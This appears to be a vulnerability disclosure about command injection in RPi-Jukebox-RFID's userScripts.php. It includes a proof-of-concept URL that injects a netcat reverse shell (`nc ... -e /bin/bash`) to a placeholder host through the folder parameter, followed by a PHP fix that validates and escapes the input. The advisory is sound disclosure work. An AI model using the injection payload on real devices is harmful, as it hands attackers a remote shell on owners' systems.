Submission #265104: miczflor rpi-jukebo 1.0 Remote code execution via web application in miczflor/rpi-jukebo
Info

Title: miczflor rpi-jukebo 1.0 Remote code execution via web application in miczflor/rpi-jukebo
Description: Remote code execution via web application in miczflor/rpi-jukebox-rfid

Description: The provided PHP code contains a critical security vulnerability that can lead to Remote Code Execution (RCE) attacks. The vulnerability arises from insufficient input validation and improper handling of user-supplied data. An attacker can exploit this vulnerability to execute arbitrary commands on the server, potentially compromising the entire system's security.

Proof of Concept (PoC): An attacker can exploit the vulnerability by manipulating the folder and folderNew parameters in the URL query string to inject malicious commands. Here is a simplified example of the PoC. Craft the URL for the device:

http://example.com/userScripts.php?folder=;nc x.x.x.x 4444 -e /bin/bash;&folderNew=test

When the PHP code executes the command, it becomes:

sudo /path/to/userscripts/;nc x.x.x.x 4444 -e /bin/bash; test

Both parameters are vulnerable in the GET and the POST request method and need to be sanitized.
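One way to sanitize both parameters before they reach a shell command, as an added example that is not code from the RPi-Jukebox-RFID project: an allowlist on the folder name, a path check against an allowed root, and escapeshellarg() on every argument. The variable names, the script path and the exact command shape are assumptions, since the report does not show the original code.

```php
<?php
// Added example, not code from the RPi-Jukebox-RFID project. Hypothetical names:
// $scriptsDir (directory of the user scripts), $audioRoot (folder tree the
// scripts may operate on), read_param(), validate_folder(), build_command().
$scriptsDir = '/path/to/userscripts';   // placeholder, matches the report's wording
$audioRoot  = '/path/to/audiofolders';  // placeholder
$userScript = $scriptsDir . '/placeholder-script.sh'; // placeholder: real name not in the report

// The report notes both GET and POST are affected, so read from either.
function read_param(string $name): ?string {
    if (isset($_POST[$name])) return (string) $_POST[$name];
    if (isset($_GET[$name]))  return (string) $_GET[$name];
    return null;
}

// Allowlist the folder name: path segments of [A-Za-z0-9._ -] only, so shell
// metacharacters such as ";" (used in the PoC) are rejected before any command
// string is built. With $mustExist the resolved path must also stay under $root.
function validate_folder(?string $value, string $root, bool $mustExist): ?string {
    if ($value === null || $value === '' || strlen($value) > 255) return null;
    if (!preg_match('#^[A-Za-z0-9._ -]+(/[A-Za-z0-9._ -]+)*$#', $value)) return null;
    foreach (explode('/', $value) as $seg) {
        if ($seg === '.' || $seg === '..') return null;   // no traversal segments
    }
    if ($mustExist) {
        $rootReal = realpath($root);
        $full     = realpath($root . '/' . $value);
        if ($rootReal === false || $full === false) return null;
        if (strpos($full . '/', $rootReal . '/') !== 0) return null;
    }
    return $value;
}

// Quote every argument so it reaches the script as a single word even after
// validation; never concatenate raw request data into the command line.
function build_command(string $script, string $folder, string $folderNew): string {
    return 'sudo ' . escapeshellarg($script) . ' '
         . escapeshellarg($folder) . ' ' . escapeshellarg($folderNew);
}

$folder    = validate_folder(read_param('folder'),    $audioRoot, true);
$folderNew = validate_folder(read_param('folderNew'), $audioRoot, false);
if ($folder === null || $folderNew === null) {
    http_response_code(400);
    exit('Invalid folder parameter');
}
$output = shell_exec(build_command($userScript, $folder, $folderNew));
echo htmlspecialchars((string) $output, ENT_QUOTES, 'UTF-8');
```

With this in place the PoC value `;nc x.x.x.x 4444 -e /bin/bash;` fails the allowlist and the request is rejected with HTTP 400 before any command runs.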
Source: https://github.com/MiczFlor/RPi-Jukebox-RFID/blob/0bb38334d6d0fad47b95235ffc466d8d9530144d/htdocs/userScripts.php#L67
User: torada (UID 61170)
Submitted: 09/01/2024 23:41 (2 years ago)
Moderated: 19/01/2024 08:00 (9 days later)
Status: accepted
VulDB Entry: 251540 [MiczFlor RPi-Jukebox-RFID up to 2.5.0 HTTP Request userScripts.php folder privilege escalation]
Points: 20
